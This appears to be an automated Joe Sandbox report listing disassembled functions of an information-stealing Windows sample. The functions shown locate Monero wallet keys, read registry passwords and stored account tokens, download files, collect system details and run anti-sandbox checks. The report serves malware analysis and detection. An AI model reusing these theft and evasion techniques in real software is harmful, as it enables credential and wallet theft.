Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$ChangeCopyCreateDeleteFindFreeNotificationOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3420786452-218353709
Opcode ID: 3225e1c83444d636b3669e8be401efefa81135c10729212fbea987a44febdf93
Instruction ID: b5eb1e2d9a8a1e3cf56e2c34e54d9e93e9a372b4459d7a8870c797c8d4c08f80
Opcode Fuzzy Hash: 3225e1c83444d636b3669e8be401efefa81135c10729212fbea987a44febdf93
Instruction Fuzzy Hash: AB5184B1D501186BCB14EB61DC96FED733CAF50314F4041ADB60A62092EE785BD9CBAA

Function 004060F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

InternetOpenA.WININET(00420DE2,00000001,00000000,00000000,00000000), ref: 0040615F
StrCmpCA.SHLWAPI(?,0273B6D0), ref: 00406197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
InternetReadFile.WININET(q&A,?,00000400,?), ref: 0040622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
InternetCloseHandle.WININET(q&A), ref: 004062A3
InternetCloseHandle.WININET(00000000), ref: 004062B0

Strings

q&A, xrefs: 0040629F, 00406228, 0040622B, 004062A2
q&A, xrefs: 00406100, 004061CF, 004062B6, 00406174, 00406103

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Internet$CloseFileHandle$Open$??2@CrackCreateReadWritelstrcpylstrlen
String ID: q&A$q&A
API String ID: 449328342-3681770271
Opcode ID: 63de9015052ce5c958739338f7016b4a6e2630d38e3d3d7a1eeb9c3818a44d6f
Instruction ID: 439f38139d03757dc0e639f6b6df0271613160f362a72270d2c4ade6ce016e72
Opcode Fuzzy Hash: 63de9015052ce5c958739338f7016b4a6e2630d38e3d3d7a1eeb9c3818a44d6f
Instruction Fuzzy Hash: C15161B1A00218ABDB20EF50CD49FEE7779AF44305F1081ADB606B71C1DB786A95CF99

Function 00407610 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407310: memset.MSVCRT ref: 00407354
Part of subcall function 00407310: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CD0), ref: 0040737A
Part of subcall function 00407310: RegEnumValueA.ADVAPI32(00407CD0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073F1
Part of subcall function 00407310: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040744D
Part of subcall function 00407310: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407492
Part of subcall function 00407310: HeapFree.KERNEL32(00000000,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407499

lstrcat.KERNEL32(35442020,004217A0), ref: 00407646
lstrcat.KERNEL32(35442020,00000000), ref: 00407688
lstrcat.KERNEL32(35442020, : ), ref: 0040769A
lstrcat.KERNEL32(35442020,00000000), ref: 004076CF
lstrcat.KERNEL32(35442020,004217A8), ref: 004076E0
lstrcat.KERNEL32(35442020,00000000), ref: 00407713
lstrcat.KERNEL32(35442020,004217AC), ref: 0040772D
task.LIBCPMTD ref: 0040773B

Strings

: , xrefs: 0040768E

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: ea4af66432e175890d232238cdc4e6e4d9d9e436a8d2b39900d38b7316cc0590
Instruction ID: 05ed671df160738881f441edec20510396de118aefbcae7eba62044a73751e2f
Opcode Fuzzy Hash: ea4af66432e175890d232238cdc4e6e4d9d9e436a8d2b39900d38b7316cc0590
Instruction Fuzzy Hash: FC318476D00509EBCB14EBA0DD45DEF7779AF94304F14402EF502772A0CA38A946CFA9

Function 00407310 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407354
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CD0), ref: 0040737A
RegEnumValueA.ADVAPI32(00407CD0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073F1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040744D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407492
HeapFree.KERNEL32(00000000,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407499

Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB

task.LIBCPMTD ref: 00407595

Strings

Password, xrefs: 00407441

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
Instruction ID: 975b1f2fff90f96d03099a1470760af69fc6b50b1064dc5ad3510b71ddc5061f
Opcode Fuzzy Hash: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
Instruction Fuzzy Hash: 52613DB5D041689BDB24DF50CC41BDAB7B8BF48304F0081EAE689A6181DFB46BC9CF95

Function 00416FA0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00416FE2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004170A3
HeapAlloc.KERNEL32(00000000), ref: 004170AA
wsprintfA.USER32 ref: 004170E0

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Strings

C, xrefs: 00416FEC
\, xrefs: 00417000
:, xrefs: 00416FFC

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 11e96b5f598d36b5145eb5ca339976e7cb65ddbe81ead056b2f3bcd54bd5f766
Instruction ID: 54c0e4e4c236f1d7f0585d8ba6b1fa909b8b3bfc40374ef6a46e6daa0de72561
Opcode Fuzzy Hash: 11e96b5f598d36b5145eb5ca339976e7cb65ddbe81ead056b2f3bcd54bd5f766
Instruction Fuzzy Hash: 1341B1B1D04248EBDB20DFA4CC45BEEBBB8AF08714F14009DF50967281D7786A84CBA9

Function 00417BA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,027397B8,00000000,?,00420DFC,00000000,?,00000000), ref: 00417BD0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,027397B8,00000000,?,00420DFC,00000000,?,00000000,00000000), ref: 00417BD7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00417BF8
__aulldiv.LIBCMT ref: 00417C12
__aulldiv.LIBCMT ref: 00417C20
wsprintfA.USER32 ref: 00417C4C

Strings

@, xrefs: 00417BED
%d MB, xrefs: 00417C43

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
Instruction ID: f6ead53c39b4582a22ff827f4f83d0c2aee1884270de42e44796eba59a74ffdb
Opcode Fuzzy Hash: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
Instruction Fuzzy Hash: AD218CF1E44218ABDB10DFD8CC49FAEB7B9FB08B14F104509F605BB280D77869018BA9

Function 00416B70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00416B7E

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

OpenProcess.KERNEL32(001FFFFF,00000000,00416DAD,004205AD), ref: 00416BBC
memset.MSVCRT ref: 00416C0A
??_V@YAXPAX@Z.MSVCRT ref: 00416D5E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00416C2C

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: a6ee68ca11034ff8030c736304bc0965813dc6bb2750f6188608d63e09cfc2d9
Instruction ID: 7f38ab3eb3b1a919a3e5ec0c0fab515e305e32cb9f2de8b47bf31e49bfe0b2e9
Opcode Fuzzy Hash: a6ee68ca11034ff8030c736304bc0965813dc6bb2750f6188608d63e09cfc2d9
Instruction Fuzzy Hash: 285162B0D002189BDB24EB95DC45BEEB774AF44318F5041AEE50566281EB78AEC8CF5D

Function 0040B8E0 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrlenA.KERNEL32(00000000), ref: 0040BADD

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BB0B
lstrlenA.KERNEL32(00000000), ref: 0040BBE3
lstrlenA.KERNEL32(00000000), ref: 0040BBF7

Strings

AccountTokens, xrefs: 0040B9A9
AccountTokens, xrefs: 0040B91A
SELECT service, encrypted_token FROM token_service, xrefs: 0040BA4B
AccountId, xrefs: 0040BB02

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: a25b80053a3247d6c928121d2a803e4d1eb5756c05121794ed4427b4faaf7bae
Instruction ID: 210edd3ff24f1e31e7376af0b8f6dc5aafa9379f597eea4b8f30950ff7929db6
Opcode Fuzzy Hash: a25b80053a3247d6c928121d2a803e4d1eb5756c05121794ed4427b4faaf7bae
Instruction Fuzzy Hash: 32A16271911108ABCF14FBA1DC56EEE7339AF54318F40416EF40772191EF786A98CBAA

Function 00416490 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,0271B960), ref: 004192B1
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,0271B990), ref: 004192CA
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,0271BC18), ref: 004192E2
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,0271BA38), ref: 004192FA
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,0271BA98), ref: 00419313
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,02716708), ref: 0041932B
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,02715D60), ref: 00419343
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,02715CA0), ref: 0041935C
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,0271BC00), ref: 00419374
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,0271BC90), ref: 0041938C
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,0271BAE0), ref: 004193A5
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,0271BAC8), ref: 004193BD
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,02715C40), ref: 004193D5
Part of subcall function 00419270: GetProcAddress.KERNEL32(75900000,0271BAF8), ref: 004193EE

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211

Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E

Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004164BC), ref: 0040112B
Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294

Part of subcall function 00416210: GetUserDefaultLangID.KERNEL32(?,?,004164C6,00420ADA), ref: 00416214

GetUserDefaultLangID.KERNEL32 ref: 004164C6

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6

Part of subcall function 004172F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
Part of subcall function 004172F0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F

Part of subcall function 00417380: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
Part of subcall function 00417380: HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02716658,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 0041656A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416588
CloseHandle.KERNEL32(00000000), ref: 00416599
Sleep.KERNEL32(00001770), ref: 004165A4
CloseHandle.KERNEL32(?,00000000,?,02716658,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 004165BA
ExitProcess.KERNEL32 ref: 004165C2

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1125299040-0
Opcode ID: f5cd3a1d8a558202e0912a61cb1b228e4a533b036098cbf949c8092211e551f8
Instruction ID: 0c3fac6cf7b50bea5c1f94bc3db5f65e3227356296d56eb517008ea5f4118e6e
Opcode Fuzzy Hash: f5cd3a1d8a558202e0912a61cb1b228e4a533b036098cbf949c8092211e551f8
